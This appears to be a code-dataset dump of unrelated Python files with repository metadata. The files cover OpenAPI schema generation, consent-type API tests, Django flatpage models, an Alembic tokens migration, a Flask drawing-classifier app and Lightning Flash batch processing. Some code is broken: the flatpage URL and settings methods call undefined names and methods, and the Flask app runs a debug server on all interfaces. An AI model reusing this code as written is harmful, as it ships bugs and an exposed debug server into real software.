except DuplicateComponentNameError:
pass
data['requestBody']['required'] = True
data['requestBody']['content'] = {
'application/json': {
'schema': {'$ref': '#/components/schemas/' + model_cls.__name__}
}
}
if 'tools.model_params.cls' in cp_config:
model_cls = cp_config['tools.model_params.cls']
data['parameters'] = data.get('parameters', [])
# In query vs in path
for key, obj in model_cls.__dict__.items():
inn = 'query'
if '{' + key + '}' in path:
inn = 'path'
if isinstance(obj, FieldDescriptor):
paramenters = {
'name': key,
'in': inn,
'required': model_cls._fields[key].required,
'schema': parse_model_type(self.spec, model_cls._fields[key]),
}
if isinstance(model_cls._fields[key]._default, UndefinedType) is False:
paramenters['schema']['default'] = model_cls._fields[key]._default
data['parameters'].append(paramenters)
if 'tools.model_out.cls' in cp_config:
model_cls = cp_config['tools.model_out.cls']
try:
self.spec.components.schema(model_cls.__name__, component=parse_model(self.spec, model_cls))
except DuplicateComponentNameError:
pass
data['responses'][200]['content'] = {
'application/json': {
'schema': {'$ref': '#/components/schemas/' + model_cls.__name__}
}
}
if 'tools.model_out_pagination.cls' in cp_config:
model_cls = cp_config['tools.model_out_pagination.cls']
try:
self.spec.components.schema(model_cls.__name__, component=parse_model(self.spec, model_cls))
except DuplicateComponentNameError:
pass
self.spec.components.schema("List" + model_cls.__name__,
component={
'type': 'object',
'properties': {
path.split("/")[-1]: {
'type': 'array',
'items': {
'$ref': '#/components/schemas/' + model_cls.__name__}
},
path.split("/")[-1] + "_links": {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'href': {
'type': 'string'
},
'rel': {
'type': 'string'
}
}
}
}
},
})
data['responses'][200]['content'] = {
'application/json': {
'schema': {'$ref': '#/components/schemas/' + "List" + model_cls.__name__}
}
}
if 'tools.enforce_permission.permission_name' in cp_config:
data['x-required-permission'] = cp_config['tools.enforce_permission.permission_name']
operations.update(new_operations)
return None
def parse_model(spec, model_cls):
kwargs = {
'properties': {},
'type': 'object',
'required': [],
}
for key, obj in model_cls.__dict__.items():
if isinstance(obj, FieldDescriptor):
kwargs['properties'][key] = parse_model_type(spec, model_cls._fields[key])
if model_cls._fields[key].required:
kwargs['required'].append(key)
if len(kwargs['required']) == 0:
del kwargs['required']
return kwargs
def parse_model_type(spec, model_type):
swagger_types = {
StringType: 'string',
NameType: 'string',
UUIDType: 'string',
EmailType: 'string',
EnumType: 'string',
ArrowType: 'string',
IntType: 'integer',
BooleanType: 'boolean',
ListType: 'array',
DictType: 'object',
ModelType: 'object',
}
data = {
# Find the swagger type, if not found default to string
# It would be nice to have complex types like uuid, emails, ect...
# But swagger doesn't support it
"type": swagger_types.get(model_type.__class__, "string")
}
if model_type.__class__ == EnumType:
data['enum'] = [x.value for x in model_type.enum_class]
if model_type.__class__ == ListType:
if model_type.field.__class__ == ModelType:
try:
spec.components.schema(model_type.field.model_class.__name__,
component=parse_model(spec, model_type.field.model_class))
except DuplicateComponentNameError:
pass
data['items'] = {
'$ref': '#/components/schemas/' + model_type.field.model_class.__name__
}
else:
data['items'] = parse_model_type(spec, model_type.field)
if model_type.__class__ == DictType:
data['additionalProperties'] = parse_model_type(spec, model_type.field)
if model_type.__class__ == ModelType:
try:
spec.components.schema(model_type.model_class.__name__, component=parse_model(spec, model_type.model_class))
except DuplicateComponentNameError:
pass
data['additionalProperties'] = {
'$ref': '#/components/schemas/' + model_type.model_class.__name__
}
return data
| 43.632653
| 120
| 0.450889
|
dfcd27f0e3f17eee342ca1d024f5c9c1933d8cf6
| 4,251
|
py
|
Python
|
test/api/test_consent_type.py
|
ryomahan/read-tracardi-api
|
d0a012fb097ca81daf046b314000301eb54bfad8
|
[
"MIT"
] | 3
|
2021-11-27T18:03:31.000Z
|
2022-02-06T21:47:59.000Z
|
test/api/test_consent_type.py
|
ryomahan/read-tracardi-api
|
d0a012fb097ca81daf046b314000301eb54bfad8
|
[
"MIT"
] | 13
|
2021-11-03T18:15:06.000Z
|
2022-03-27T22:28:38.000Z
|
test/api/test_consent_type.py
|
ryomahan/read-tracardi-api
|
d0a012fb097ca81daf046b314000301eb54bfad8
|
[
"MIT"
] | 8
|
2021-11-16T04:07:41.000Z
|
2022-03-14T14:51:34.000Z
|
from ..utils import Endpoint
from fastapi import HTTPException
endpoint = Endpoint()
def test_post_consent_type():
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
data = {
"name": "test-name",
"description": "test-description",
"revokable": False,
"default_value": "deny",
"enabled": False,
"tags": ["tag1", "tag2", "tag3"],
"required": False,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
data = {
"name": "test-name",
"description": "test-description",
"revokable": False,
"default_value": "incorrect_data",
"enabled": False,
"tags": ["tag1", "tag2", "tag3"],
"required": False,
"auto_revoke": "incorrect_data"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert "detail" in result
assert result["detail"][0]["loc"][1] == "default_value"
assert result["detail"][1]["loc"][1] == "auto_revoke"
endpoint.delete("/consent/type/test-name")
def test_get_consent_type_id():
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
result = endpoint.get("/consent/type/test-name")
result = result.json()
assert "id" in result and result["id"] == "test-name"
endpoint.delete("/consent/type/test-name")
def test_delete_consent_type_id():
try:
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
result = endpoint.delete("/consent/type/test-name")
result = result.json()
assert result == {"deleted": 1}
result = endpoint.delete("/consent/type/test-name")
result = result.json()
assert result == {"deleted": 0}
finally:
endpoint.delete("/consent/type/test-name")
def test_get_consents_type():
result = endpoint.get("/consents/type")
def test_get_consents_type_enabled():
try:
data = {
"name": "test-name",
"description": "test-description",
"revokable": True,
"default_value": "grant",
"enabled": True,
"tags": ["tag1", "tag2", "tag3"],
"required": True,
"auto_revoke": "15m"
}
result = endpoint.post("/consent/type", data)
result = result.json()
assert not result["errors"]
assert result["saved"] == 1
assert result["ids"] == ["test-name"]
result = endpoint.get("/consents/type/enabled")
result = result.json()
assert {consent["enabled"] for consent in result["result"]} == {True}
finally:
endpoint.delete("/consent/type/test-name")
def test_put_consents_type_refresh():
result = endpoint.put("/consents/type/refresh")
def test_get_consents_type_by_tag():
result = endpoint.get("/consents/type/by_tag")
| 25.153846
| 77
| 0.549988
|
306cc8d72a07e27308ba73c963f7379c9513c672
| 4,809
|
py
|
Python
|
cargo/flatpages/models.py
|
dalou/django-cargo
|
633d051ca8647623adbab746c9da9153f46e1e8f
|
[
"BSD-3-Clause"
] | null | null | null |
cargo/flatpages/models.py
|
dalou/django-cargo
|
633d051ca8647623adbab746c9da9153f46e1e8f
|
[
"BSD-3-Clause"
] | null | null | null |
cargo/flatpages/models.py
|
dalou/django-cargo
|
633d051ca8647623adbab746c9da9153f46e1e8f
|
[
"BSD-3-Clause"
] | null | null | null |
# encoding: utf-8
from django.db import models
from django.utils.html import strip_tags
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from cargo.fields import HTMLField
# from taggit_autosuggest.managers import TaggableManager as AutosuggestTaggableManager
class FlatPagePosition(models.Model):
flatpage = models.ForeignKey("cargo.FlatPage", verbose_name="Page statique", related_name="positions")
PLACEMENT_HEADER = 'HEADER'
PLACEMENT_FOOTER = 'FOOTER'
PLACEMENT_CHOICES = (
(PLACEMENT_HEADER, u"Haut de page"),
(PLACEMENT_FOOTER, u"Pied de page"),
)
placement = models.CharField("Position", max_length=254, choices=PLACEMENT_CHOICES, default=PLACEMENT_FOOTER)
order = models.PositiveIntegerField(u"Ordre d'affichage", default=1)
order_col = models.PositiveIntegerField(u"Ordre Colonne", blank=True, null=True)
is_active = models.BooleanField(default=True, verbose_name=u"Activée ?")
class Meta:
abstract = True
verbose_name = u"Position d'un lien de page statique"
verbose_name_plural = u"Positions des page statique"
ordering = ('placement' ,'order_col', 'order', )
class FlatPage(models.Model):
created_date = models.DateTimeField(u"Date created", auto_now_add=True)
updated_date = models.DateTimeField(u"Date updated", auto_now=True, db_index=True)
title = models.CharField(u"Titre", max_length=254)
link_name = models.CharField(u"Nom du lien", max_length=254, blank=True, null=True)
LINK_TYPE_PAGE = "PAGE"
LINK_TYPE_APP = "APP"
LINK_TYPE_EXTERNAL = "EXTERNAL"
LINK_TYPE_CHOICES = (
(LINK_TYPE_PAGE, u"Page HTML"),
(LINK_TYPE_APP, u"Page interne existante"),
(LINK_TYPE_EXTERNAL, u"Page externe"),
)
link_type = models.CharField(u"Type de page", max_length=254, choices=LINK_TYPE_CHOICES, default=LINK_TYPE_PAGE)
link_value = models.CharField(u"URL", max_length=254, blank=True, null=True)
meta_title = models.CharField(u"Meta - Titre", max_length=254, blank=True, null=True)
meta_description = models.CharField(u"Meta - Description", max_length=254, blank=True, null=True)
# tags = AutosuggestTaggableManager(verbose_name="Tags", help_text=u"Séparez par une virgule ou utilisez la touche tabulation.", related_name="CARGO_flatpages", blank=True)
content = HTMLField(u"Contenu", blank=True)
is_active = models.BooleanField(default=True, verbose_name=u"Activée ?")
slug = models.CharField(u"Url de la page", max_length=254, default="", blank=True, help_text=u"auto générée, ne changer que si conflits d'url")
class Meta:
abstract = True
verbose_name = u"Page statique"
verbose_name_plural = u"Pages statiques"
ordering = ('title', )
@models.permalink
def get_absolute_url(self):
return ('flatpage:view', (), {'slug': self.slug })
def get_url(self):
if self.link_value:
if self.link_type == FlatPage.LINK_TYPE_APP:
if self.link_value.find(':') != -1:
return reverse(self.link_value)
else:
return self.link_value
elif self.link_type == FlatPage.LINK_TYPE_EXTERNAL:
if not self.value.startsWith('http://') or \
not self.value.startsWith('https://'):
self.link_value = "http://" % self.link_value
return self.link_value
else:
return self.get_absolute_url()
# return reverse(*reverse_url)
def get_tags(self):
return [ tag.strip() for tag in re.split(r"[\|,:;#!\.\-_]+", self.tags)]
def __unicode__(self):
return self.title
def save(self, **kwargs):
if not self.slug or self.slug.strip().strip('/') == "":
self.slug = slugify(self.title)
self.slug = "/".join([ slugify(slug) for slug in self.slug.split('/') ])
if self.slug.strip('/').startswith('admin'):
self.slug = self.slug.replace('admin', '__admin')
if not self.link_name and self.title:
self.link_name = self.title
super(FlatPage, self).save(**kwargs)
class FlatPageSettings(models.Model):
class Meta:
abstract = True
verbose_name = u"Paramètre"
verbose_name_plural = u"Paramètres"
def __unicode__(self):
return u"Paramètres"
def save(self, *args, **kwargs):
if Settings.objects.count():
Settings.objects.first().delete()
super(Settings, self).save(*args, **kwargs)
@staticmethod
def get_settings():
settings = Settings.objects.first()
if not settings:
settings = Settings()
settings.save()
return settings
| 36.709924
| 176
| 0.653358
|
1172ec2ad7a3db87a8ebe3c1d5d53c5c778aec71
| 375
|
py
|
Python
|
_test.py
|
Politraf/politraf
|
d6b04fa7f2a3e88861ef38a6e8ff0cb4ae4e67b7
|
[
"MIT"
] | 6
|
2017-07-31T09:03:41.000Z
|
2019-03-30T18:50:04.000Z
|
_test.py
|
Politraf/politraf
|
d6b04fa7f2a3e88861ef38a6e8ff0cb4ae4e67b7
|
[
"MIT"
] | 84
|
2018-06-07T15:43:13.000Z
|
2022-01-26T16:48:46.000Z
|
_test.py
|
Politraf/politraf
|
d6b04fa7f2a3e88861ef38a6e8ff0cb4ae4e67b7
|
[
"MIT"
] | 2
|
2018-03-07T12:38:30.000Z
|
2020-01-13T00:30:48.000Z
|
import pytest
import socket as s
@pytest.fixture
def socket(request):
_socket = s.socket(s.AF_INET, s.SOCK_STREAM)
def socket_teardown():
_socket.close()
request.addfinalizer(socket_teardown)
return _socket
def test_server_connect(socket):
socket.connect(('127.0.0.1',8123))
assert socket
if not socket:
raise AssertionError()
| 19.736842
| 48
| 0.693333
|
e9611b542dceed66be0e4e38695d19efa982940c
| 645
|
py
|
Python
|
app/migrations/versions/d73af147c118_create_tokens_table.py
|
Basselbi/hikma-health-backend
|
0f891821a04aa103fff62097443bd585bc342dbc
|
[
"MIT"
] | null | null | null |
app/migrations/versions/d73af147c118_create_tokens_table.py
|
Basselbi/hikma-health-backend
|
0f891821a04aa103fff62097443bd585bc342dbc
|
[
"MIT"
] | null | null | null |
app/migrations/versions/d73af147c118_create_tokens_table.py
|
Basselbi/hikma-health-backend
|
0f891821a04aa103fff62097443bd585bc342dbc
|
[
"MIT"
] | null | null | null |
"""create_tokens_table
Revision ID: d73af147c118
Revises: fc3a6a2ca002
Create Date: 2020-04-29 11:05:20.619408
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd73af147c118'
down_revision = 'fc3a6a2ca002'
branch_labels = None
depends_on = None
def upgrade():
op.execute("""
CREATE TABLE tokens (
user_id uuid REFERENCES users (id),
token text not null,
expiry timestamptz not null default now() + INTERVAL '60 minutes'
);
""")
op.execute('CREATE INDEX ON tokens (token)')
def downgrade():
op.execute(
'''DROP TABLE tokens;'''
)
| 18.970588
| 71
| 0.677519
|
d3f0ecd29f4757f51cc048a87cf2c664fdd66807
| 4,358
|
py
|
Python
|
Flictionary-Flask/app.py
|
datascisteven/Flictionary
|
54cd31df185b7ea7fdfefebe5e211abde143319d
|
[
"MIT"
] | null | null | null |
Flictionary-Flask/app.py
|
datascisteven/Flictionary
|
54cd31df185b7ea7fdfefebe5e211abde143319d
|
[
"MIT"
] | null | null | null |
Flictionary-Flask/app.py
|
datascisteven/Flictionary
|
54cd31df185b7ea7fdfefebe5e211abde143319d
|
[
"MIT"
] | null | null | null |
from flask import Flask, render_template
import numpy as np
import tensorflow as tf
from PIL import Image
import base64
from io import BytesIO
import cv2
import os
import json
import random
import matplotlib
matplotlib.use('Agg')
import plotly
import plotly.graph_objs as go
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.models import load_model
# import image processing
from image_utils import crop_image, normalize_image, convert_to_rgb, convert_to_np
# Dictionary with label codes
label_dict = {0:'ant', 1:'bat', 2:'bear', 3:'bee', 4:'butterfly',
5:'camel', 6:'cat', 7:'cow', 8:'crab', 9:'crocodile',
10:'dog', 11:'dolphin', 12:'dragon', 13:'duck', 14:'elephant',
15:'flamingo', 16:'frog', 17:'giraffe', 18:'hedgehog', 19:'horse',
20:'kangaroo', 21:'lion', 22:'lobster', 23:'monkey', 24:'mosquito',
25:'mouse', 26:'octopus', 27:'owl', 28:'panda', 29:'parrot',
30:'penguin', 31:'pig', 32:'rabbit', 33:'raccoon', 34:'rhinoceros',
35:'scorpion', 36:'sea turtle', 37:'shark', 38:'sheep', 39:'snail',
40:'snake', 41:'spider', 42:'squirrel', 43:'swan', 44:'tiger',
45:'whale', 46:'zebra'}
def animal_picker():
random_key = random.randint(0, 47)
random_animal = label_dict[random_key]
return random_animal, random_key
def loading_model(filepath='model/model_h5.h5'):
print("Loading model from {} \n".format(filepath))
model = load_model(filepath)
graph = tf.compat.v1.get_default_graph()
return model, graph
def make_prediction(model, input):
input = cv2.resize(input, (96, 96))
img_array = img_to_array(input)
img_array = np.expand_dims(img_array, 0)
preds = model.predict(img_array)[0]
ind = (-preds).argsort()[:10]
top_10_animals = [label_dict[x] for x in ind]
label = ind[0]
label_name = top_10_animals[0]
preds.sort()
top_10_values = preds[::-1][:10]
return label, label_name, ind, preds, top_10_animals, top_10_values
app = Flask(__name__)
# load model
model, graph = loading_model()
@app.route('/')
@app.route('/index')
def index():
random_animal, random_key = animal_picker()
return render_template('index.html', random_animal=random_animal)
@app.route('/go/<dataURL>')
def pred(dataURL):
# decode base64 '._-' -> '+/='
dataURL = dataURL.replace('.', '+')
dataURL = dataURL.replace('_', '/')
dataURL = dataURL.replace('-', '=')
# get the base64 string and convert string to bytes
image_b64_str = dataURL
byte_data = base64.b64decode(image_b64_str)
image_data = BytesIO(byte_data)
# open Image with PIL and convert image
img = Image.open(image_data)
img = img.convert("RGBA")
image_cropped = crop_image(img)
image_normalized = normalize_image(image_cropped)
img_rgb = convert_to_rgb(image_normalized)
image_np = convert_to_np(img_rgb)
# apply model and print prediction
label, label_num, ind, preds, top_10_animals, top_10_values = make_prediction(model, image_np)
print("This is a {}".format(label_num))
# plt.style.use('tableau-colorblind10')
# x = top_10_animals
# y = top_10_values
# sns.barplot(y, x)
# plt.savefig('top10.png')
# create plotly visualization
graphs = [
#plot with probabilities for each class of images
{'data': [go.Bar(x = preds.ravel().tolist(),
y = [label_dict[pred] for pred in ind[::-1]],
orientation = 'h')],
'layout': {'title': 'Class Probabilities',
'yaxis': {'title': "Classes"},
'xaxis': {'title': "Probability", }
}
}]
# encode plotly graphs in JSON
ids = ["graph-{}".format(i) for i, _ in enumerate(graphs)]
graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)
# render the hook.html passing prediction resuls
return render_template(
'hook.html',
result = label_num, # predicted class label
ids=ids, # plotly graph ids
graphJSON=graphJSON, # json plotly graphs
dataURL = dataURL # image to display with result)
if __name__ == '__main__':
port=int(os.environ.get('PORT', 5000))
app.run(debug=True, host='0.0.0.0', port=port)
| 34.314961
| 98
| 0.637907
|
dd0ed1e9ddc6fdf8569494a1124bc591d5ca68cf
| 14,653
|
py
|
Python
|
flash/core/data/batch.py
|
LoopGlitch26/lightning-flash
|
a1bece4361a7cb5449715bef9975696e96c5f9ae
|
[
"Apache-2.0"
] | null | null | null |
flash/core/data/batch.py
|
LoopGlitch26/lightning-flash
|
a1bece4361a7cb5449715bef9975696e96c5f9ae
|
[
"Apache-2.0"
] | null | null | null |
flash/core/data/batch.py
|
LoopGlitch26/lightning-flash
|
a1bece4361a7cb5449715bef9975696e96c5f9ae
|
[
"Apache-2.0"
] | 1
|
2021-07-14T09:17:46.000Z
|
2021-07-14T09:17:46.000Z
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Callable, Dict, List, Mapping, Optional, Sequence, Tuple, TYPE_CHECKING, Union
import torch
from pytorch_lightning.trainer.states import RunningStage
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from torch import Tensor
from flash.core.data.callback import ControlFlow
from flash.core.data.data_source import DefaultDataKeys
from flash.core.data.utils import (
_contains_any_tensor,
convert_to_modules,
CurrentFuncContext,
CurrentRunningStageContext,
)
if TYPE_CHECKING:
from flash.core.data.process import Deserializer, Preprocess, Serializer
class _Sequential(torch.nn.Module):
"""This class is used to chain 3 functions together for the _Preprocessor ``per_sample_transform`` function.
1. ``pre_tensor_transform``
2. ``to_tensor_transform``
3. ``post_tensor_transform``
"""
def __init__(
self,
preprocess: "Preprocess",
pre_tensor_transform: Optional[Callable],
to_tensor_transform: Optional[Callable],
post_tensor_transform: Callable,
stage: RunningStage,
assert_contains_tensor: bool = False,
):
super().__init__()
self.preprocess = preprocess
self.callback = ControlFlow(self.preprocess.callbacks)
self.pre_tensor_transform = convert_to_modules(pre_tensor_transform)
self.to_tensor_transform = convert_to_modules(to_tensor_transform)
self.post_tensor_transform = convert_to_modules(post_tensor_transform)
self.stage = stage
self.assert_contains_tensor = assert_contains_tensor
self._current_stage_context = CurrentRunningStageContext(stage, preprocess, reset=False)
self._pre_tensor_transform_context = CurrentFuncContext("pre_tensor_transform", preprocess)
self._to_tensor_transform_context = CurrentFuncContext("to_tensor_transform", preprocess)
self._post_tensor_transform_context = CurrentFuncContext("post_tensor_transform", preprocess)
def forward(self, sample: Any) -> Any:
self.callback.on_load_sample(sample, self.stage)
with self._current_stage_context:
if self.pre_tensor_transform is not None:
with self._pre_tensor_transform_context:
sample = self.pre_tensor_transform(sample)
self.callback.on_pre_tensor_transform(sample, self.stage)
if self.to_tensor_transform is not None:
with self._to_tensor_transform_context:
sample = self.to_tensor_transform(sample)
self.callback.on_to_tensor_transform(sample, self.stage)
if self.assert_contains_tensor:
if not _contains_any_tensor(sample):
raise MisconfigurationException(
"When ``to_tensor_transform`` is overriden, "
"``DataPipeline`` expects the outputs to be ``tensors``"
)
with self._post_tensor_transform_context:
sample = self.post_tensor_transform(sample)
self.callback.on_post_tensor_transform(sample, self.stage)
return sample
def __str__(self) -> str:
return (
f"{self.__class__.__name__}:\n"
f"\t(pre_tensor_transform): {str(self.pre_tensor_transform)}\n"
f"\t(to_tensor_transform): {str(self.to_tensor_transform)}\n"
f"\t(post_tensor_transform): {str(self.post_tensor_transform)}\n"
f"\t(assert_contains_tensor): {str(self.assert_contains_tensor)}\n"
f"\t(stage): {str(self.stage)}"
)
class _DeserializeProcessor(torch.nn.Module):
def __init__(
self,
deserializer: "Deserializer",
preprocess: "Preprocess",
pre_tensor_transform: Callable,
to_tensor_transform: Callable,
):
super().__init__()
self.preprocess = preprocess
self.callback = ControlFlow(self.preprocess.callbacks)
self.deserializer = convert_to_modules(deserializer)
self.pre_tensor_transform = convert_to_modules(pre_tensor_transform)
self.to_tensor_transform = convert_to_modules(to_tensor_transform)
self._current_stage_context = CurrentRunningStageContext(RunningStage.PREDICTING, preprocess, reset=False)
self._pre_tensor_transform_context = CurrentFuncContext("pre_tensor_transform", preprocess)
self._to_tensor_transform_context = CurrentFuncContext("to_tensor_transform", preprocess)
def forward(self, sample: str):
sample = self.deserializer(sample)
with self._current_stage_context:
with self._pre_tensor_transform_context:
sample = self.pre_tensor_transform(sample)
self.callback.on_pre_tensor_transform(sample, RunningStage.PREDICTING)
with self._to_tensor_transform_context:
sample = self.to_tensor_transform(sample)
self.callback.on_to_tensor_transform(sample, RunningStage.PREDICTING)
return sample
class _SerializeProcessor(torch.nn.Module):
def __init__(
self,
serializer: "Serializer",
):
super().__init__()
self.serializer = convert_to_modules(serializer)
def forward(self, sample):
return self.serializer(sample)
class _Preprocessor(torch.nn.Module):
"""
This class is used to encapsultate the following functions of a Preprocess Object:
Inside a worker:
per_sample_transform: Function to transform an individual sample
Inside a worker, it is actually make of 3 functions:
* pre_tensor_transform
* to_tensor_transform
* post_tensor_transform
collate: Function to merge sample into a batch
per_batch_transform: Function to transform an individual batch
* per_batch_transform
Inside main process:
per_sample_transform: Function to transform an individual sample
* per_sample_transform_on_device
collate: Function to merge sample into a batch
per_batch_transform: Function to transform an individual batch
* per_batch_transform_on_device
"""
def __init__(
self,
preprocess: "Preprocess",
collate_fn: Callable,
per_sample_transform: Union[Callable, _Sequential],
per_batch_transform: Callable,
stage: RunningStage,
apply_per_sample_transform: bool = True,
on_device: bool = False,
):
super().__init__()
self.preprocess = preprocess
self.callback = ControlFlow(self.preprocess.callbacks)
self.collate_fn = convert_to_modules(collate_fn)
self.per_sample_transform = convert_to_modules(per_sample_transform)
self.per_batch_transform = convert_to_modules(per_batch_transform)
self.apply_per_sample_transform = apply_per_sample_transform
self.stage = stage
self.on_device = on_device
extension = f"{'_on_device' if self.on_device else ''}"
self._current_stage_context = CurrentRunningStageContext(stage, preprocess)
self._per_sample_transform_context = CurrentFuncContext(f"per_sample_transform{extension}", preprocess)
self._collate_context = CurrentFuncContext("collate", preprocess)
self._per_batch_transform_context = CurrentFuncContext(f"per_batch_transform{extension}", preprocess)
@staticmethod
def _extract_metadata(
samples: List[Dict[str, Any]],
) -> Tuple[List[Dict[str, Any]], Optional[List[Dict[str, Any]]]]:
metadata = [s.pop(DefaultDataKeys.METADATA, None) if isinstance(s, Mapping) else None for s in samples]
return samples, metadata if any(m is not None for m in metadata) else None
def forward(self, samples: Sequence[Any]) -> Any:
# we create a new dict to prevent from potential memory leaks
# assuming that the dictionary samples are stored in between and
# potentially modified before the transforms are applied.
if isinstance(samples, dict):
samples = dict(samples.items())
with self._current_stage_context:
if self.apply_per_sample_transform:
with self._per_sample_transform_context:
_samples = []
if isinstance(samples, Mapping):
samples = [samples]
for sample in samples:
sample = self.per_sample_transform(sample)
if self.on_device:
self.callback.on_per_sample_transform_on_device(sample, self.stage)
_samples.append(sample)
samples = type(_samples)(_samples)
with self._collate_context:
samples, metadata = self._extract_metadata(samples)
try:
samples = self.collate_fn(samples, metadata)
except TypeError:
samples = self.collate_fn(samples)
if metadata and isinstance(samples, dict):
samples[DefaultDataKeys.METADATA] = metadata
self.callback.on_collate(samples, self.stage)
with self._per_batch_transform_context:
samples = self.per_batch_transform(samples)
if self.on_device:
self.callback.on_per_batch_transform_on_device(samples, self.stage)
else:
self.callback.on_per_batch_transform(samples, self.stage)
return samples
def __str__(self) -> str:
# todo: define repr function which would take object and string attributes to be shown
return (
"_Preprocessor:\n"
f"\t(per_sample_transform): {str(self.per_sample_transform)}\n"
f"\t(collate_fn): {str(self.collate_fn)}\n"
f"\t(per_batch_transform): {str(self.per_batch_transform)}\n"
f"\t(apply_per_sample_transform): {str(self.apply_per_sample_transform)}\n"
f"\t(on_device): {str(self.on_device)}\n"
f"\t(stage): {str(self.stage)}"
)
class _Postprocessor(torch.nn.Module):
"""This class is used to encapsultate the following functions of a Postprocess Object:
Inside main process:
per_batch_transform: Function to transform a batch
per_sample_transform: Function to transform an individual sample
uncollate_fn: Function to split a batch into samples
per_sample_transform: Function to transform an individual sample
save_fn: Function to save all data
save_per_sample: Function to save an individual sample
is_serving: Whether the Postprocessor is used in serving mode.
"""
def __init__(
self,
uncollate_fn: Callable,
per_batch_transform: Callable,
per_sample_transform: Callable,
serializer: Optional[Callable],
save_fn: Optional[Callable] = None,
save_per_sample: bool = False,
is_serving: bool = False,
):
super().__init__()
self.uncollate_fn = convert_to_modules(uncollate_fn)
self.per_batch_transform = convert_to_modules(per_batch_transform)
self.per_sample_transform = convert_to_modules(per_sample_transform)
self.serializer = convert_to_modules(serializer)
self.save_fn = convert_to_modules(save_fn)
self.save_per_sample = convert_to_modules(save_per_sample)
self.is_serving = is_serving
@staticmethod
def _extract_metadata(batch: Any) -> Tuple[Any, Optional[Any]]:
metadata = None
if isinstance(batch, Mapping) and DefaultDataKeys.METADATA in batch:
metadata = batch.pop(DefaultDataKeys.METADATA, None)
return batch, metadata
def forward(self, batch: Sequence[Any]):
batch, metadata = self._extract_metadata(batch)
uncollated = self.uncollate_fn(self.per_batch_transform(batch))
if metadata:
for sample, sample_metadata in zip(uncollated, metadata):
sample[DefaultDataKeys.METADATA] = sample_metadata
final_preds = [self.per_sample_transform(sample) for sample in uncollated]
if self.serializer is not None:
final_preds = [self.serializer(sample) for sample in final_preds]
if isinstance(uncollated, Tensor) and isinstance(final_preds[0], Tensor):
final_preds = torch.stack(final_preds)
else:
final_preds = type(final_preds)(final_preds)
if self.save_fn:
if self.save_per_sample:
for pred in final_preds:
self.save_fn(pred)
else:
self.save_fn(final_preds)
return final_preds
def __str__(self) -> str:
return (
"_Postprocessor:\n"
f"\t(per_batch_transform): {str(self.per_batch_transform)}\n"
f"\t(uncollate_fn): {str(self.uncollate_fn)}\n"
f"\t(per_sample_transform): {str(self.per_sample_transform)}\n"
f"\t(serializer): {str(self.serializer)}"
)
def default_uncollate(batch: Any):
"""
This function is used to uncollate a batch into samples.
Examples:
>>> a, b = default_uncollate(torch.rand((2,1)))
"""
batch_type = type(batch)
if isinstance(batch, Tensor):
if len(batch.shape) == 0: # 0 shape tensors
return batch
return list(torch.unbind(batch, 0))
if isinstance(batch, Mapping):
return [batch_type(dict(zip(batch, default_uncollate(t)))) for t in zip(*batch.values())]
if isinstance(batch, tuple) and hasattr(batch, "_fields"): # namedtuple
return [batch_type(*default_uncollate(sample)) for sample in zip(*batch)]
if isinstance(batch, Sequence) and not isinstance(batch, str):
return [default_uncollate(sample) for sample in batch]
return batch
| 41.044818
| 114
| 0.663823
|
c8114c99003e10df7e3dc4ce84927e81f94dda8e
| 50
|
py
|
Python
|
dscript/models/__init__.py
|
Jin0331/D-SCRIPT
|
4e3ba637b786e80a27c7a67383ebe6989a5bb8f3
|
[
"MIT"
] | null | null | null |
dscript/models/__init__.py
|
Jin0331/D-SCRIPT
|
4e3ba637b786e80a27c7a67383ebe6989a5bb8f3
|
[
"MIT"
] | null | null | null |
dscript/models/__init__.py
|
Jin0331/D-SCRIPT
|
4e3ba637b786e80a27c7a67383ebe6989a5bb8f3
|
[
"MIT"
] | null | null | null |
__all__ = ["contact", "embedding", "interaction"]
| 25
| 49
| 0.68
|
9787b7d17665c97e575c82f2b711b773edf2a517
| 32,769
|
py
|
Python
|
bayes/explanations.py
|
dylan-slack/Modeling-Uncertainty-Local-Explainability
|
a0a9eac08ec987ee3e394676e84e5bd8697c6404
|
[
"MIT"
] | 15
|
2021-10-30T08:28:58.000Z
|
2022-02-25T01:22:37.000Z
|
bayes/explanations.py
|
dylan-slack/Modeling-Uncertainty-Local-Explainability
|
a0a9eac08ec987ee3e394676e84e5bd8697c6404
|
[
"MIT"
] | 2
|
2021-11-01T19:54:06.000Z
|
2022-01-14T18:02:17.000Z
|
bayes/explanations.py
|
dylan-slack/Modeling-Uncertainty-Local-Explainability
|
a0a9eac08ec987ee3e394676e84e5bd8697c6404
|
[
"MIT"
] | 3
|
2021-10-19T20:32:41.000Z
|
2022-02-19T15:45:26.000Z
|
